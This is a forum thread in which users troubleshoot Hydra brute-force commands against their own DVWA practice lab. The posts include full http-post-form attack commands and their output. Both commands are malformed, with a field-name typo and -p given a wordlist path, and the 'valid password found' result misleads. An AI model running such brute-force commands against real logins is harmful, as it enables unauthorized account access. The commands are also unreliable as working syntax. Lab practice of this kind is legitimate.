
Thread: Hydra brute force on login.php

  1. #1
    Just burned his ISO
    Join Date
    Sep 2011
    Posts
    1

    Hydra brute force on login.php

    Hello,
    I'm trying to brute force my DVWA, so I know that the username and password are correct, but I must not be doing something right (user issue)... Below is the output and command string I'm using. No matter what username and password I use, I get the same output, so I know it cannot be working. Could someone please help me find what other form or string I'm missing? Thank you very much!

    root@bt:~# hydra -V -l admin -p XXXXX -s 80 -f 172.31.253.11 http-post-form "/dvwa/login.php:usrname=^USER^&pass=^PASS^&submit=Login: Login failed"

    Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
    Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 09:48:37
    [DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
    [DATA] attacking service http-post-form on port 80
    [STATUS] attack finished for 172.31.253.11 (waiting for children to finish)
    [ATTEMPT] target 172.31.253.11 - login "admin" - pass "XXXXX" - child 0 - 1 of 1
    Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-16 09:48:37

  2. #2
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    7

    Re: Hydra brute force on login.php

    Hi,

    Maybe you should try Hydra v7; the changelog said the http-form module has been updated.

  3. #3

    Re: Hydra brute force on login.php

    Hi,

    I'm not sure that the latest Hydra, 7.4.2, can even guess anything. Today I've done some tests using DVWA's BruteForce module and the output was the same in both situations, whether or not the wordlist file contains the correct password:

    hydra -V -l admin -p /media/Pluto/final-wordlist.lst -s 80 -f 192.168.71.138 http-post-form "/dvwa/login.php:username=^USER^&pass=^PASS^&submit=Login : Login failed"
    Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

    Hydra (http://www.thc.org/thc-hydra) starting at 2013-02-10 00:40:33
    [DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
    [DATA] attacking service http-post-form on port 80
    [ATTEMPT] target 192.168.71.138 - login "admin" - pass "/media/Pluto/final-wordlist.lst" - 1 of 1 [child 0]
    [80][www-form] host: 192.168.71.138 login: admin password: /media/Pluto/final-wordlist.lst
    [STATUS] attack finished for 192.168.71.138 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found - It doesn't say which password anyway
    Hydra (http://www.thc.org/thc-hydra) finished at 2013-02-10 00:40:33

    Now I wonder, am I missing something or am I doing something wrong?
    Everyone has started from ZERO. I'm not an exception but I'm trying to hear more than speak too much.

    http://pentestconsultancy.blogspot.ro
